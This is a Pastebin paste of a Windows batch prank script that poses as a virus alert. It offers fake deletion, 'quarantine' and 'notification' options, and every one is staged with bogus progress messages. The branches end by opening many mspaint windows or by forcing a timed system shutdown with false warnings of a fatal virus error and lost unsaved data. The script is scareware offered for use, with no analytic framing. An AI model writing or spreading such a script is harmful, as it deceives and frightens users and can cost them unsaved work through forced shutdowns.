Advertisement
Guest User

kkk

a guest
Nov 8th, 2017
135
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 3.41 KB | None | 0 0
  1. @echo off
  2. color e0
  3. title WARNING!!! VIRUS DETECTED!
  4.  
  5. set input=
  6. set /p input=A virus has been found on your computer. To delete it, press D, to ignore this alert, press i.
  7. if %input%==d goto d
  8. if %input%==i goto i
  9.  
  10. echo waiting for response...
  11. ping localhost -n 1 >nul
  12.  
  13. echo waiting for response......
  14. ping localhost -n 1 >nul
  15.  
  16. :i
  17. start
  18. start mspaint
  19. start mspaint
  20. start mspaint
  21. start mspaint
  22. start mspaint
  23. start mspaint
  24. start mspaint
  25. start mspaint
  26. start mspaint
  27. start mspaint
  28. start mspaint
  29. start mspaint
  30. start cmd
  31. start mspaint
  32.  
  33. :d
  34. set input=
  35. set /p input=Please choose one of the three options. 1. Delete the virus. 2. Send to quarantine using your default AntiVirus. 3. Send a virus notification to Windows.
  36. if %input%==1 goto 1
  37. if %input%==2 goto 2
  38. if %input%==3 goto 3
  39.  
  40. :1
  41.  
  42. echo loading...
  43. ping localhost -n 1 >nul
  44. cls
  45. echo loading......
  46. ping localhost -n 1 >nul
  47. cls
  48. start shutdown -s -t 180 -c "Please Restart your Computer for the function to work and run this program again, selecting the second option.
  49.  
  50.  
  51. :2
  52. echo accesing quarantine...
  53. ping localcost -n 5 >nul
  54. echo accesing quarantine......
  55. ping localcost -n 5 >nul
  56. echo accesing quarantine...
  57. ping localcost -n 5 >nul
  58. echo accesing quarantine......
  59. ping localcost -n 5 >nul
  60. echo accesing quarantine...
  61. ping localcost -n 5 >nul
  62. echo accesing quarantine......
  63. ping localcost -n 5 >nul
  64. start shutdown -s -t 150 -c "The system has had to shut down due to a fatal error concerning the virus in your computer. All unsaved data will be lost"
  65.  
  66. :3
  67. echo Sending virus notifier...
  68. ping localhost -n 3 >nul
  69. cls
  70. echo Sending virus notifier......
  71. ping localhost -n 3 >nul
  72. cls
  73. echo Sending virus notifier...
  74. ping localhost -n 3 >nul
  75. cls
  76. echo Sending virus notifier......
  77. ping localhost -n 3 >nul
  78. cls
  79. echo Sending virus notifier...
  80. ping localhost -n 3 >nul
  81. cls
  82. echo Sending virus notifier......
  83. ping localhost -n 3 >nul
  84. cls
  85. echo Sending virus notifier...
  86. ping localhost -n 3 >nul
  87. cls
  88. echo Sending virus notifier......
  89. ping localhost -n 3 >nul
  90. cls
  91. set input=
  92. set /p input=sending the file could take some time. Do you want to proceed? Y/N
  93. if %input%==y goto y
  94. if %input%==n goto n
  95. :y
  96. echo Connecting internet server...please wait
  97. ping localhost -n 3 >nul
  98. cls
  99. echo Connecting internet server....please wait
  100. ping localhost -n 3 >nul
  101. cls
  102. echo Connecting internet server.....please wait
  103. ping localhost -n 3 >nul
  104. cls
  105. echo Connecting internet server......please wait
  106. ping localhost -n 3 >nul
  107. cls
  108. echo Connected
  109. ping localhost -n 3 >nul
  110. cls
  111. echo Accesing e-mail notifier software...
  112. ping localhost -n 3 >nul
  113. cls
  114. echo Accesing e-mail notifier software......
  115. ping localhost -n 3 >nul
  116. cls
  117. echo Accesing e-mail notifier software...
  118. ping localhost -n 3 >nul
  119. cls
  120. echo Accesing e-mail notifier software......
  121. ping localhost -n 3 >nul
  122. cls
  123. echo E-mail software accesed
  124. ping localhost -n 3 >nul
  125. cls
  126. echo Sending e-mail and software notes...
  127. ping localhost -n 3 >nul
  128. cls
  129. echo Sending e-mail and software notes......
  130. ping localhost -n 3 >nul
  131. cls
  132. echo Sending e-mail and software notes...
  133. ping localhost -n 3 >nul
  134. cls
  135. echo Sending e-mail and software notes......
  136. ping localhost -n 3 >nul
  137. cls
  138. echo Software sended
  139. ping localhost -n 3 >nul
  140. cls
  141. echo All actions proceeded completely
  142. ping localhost -n 3 >nul
  143.  
  144. :n
  145. shutdown -s -t 30 -c "iam freaking tired of this iam just shutting down the computer and running the virus!!!!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement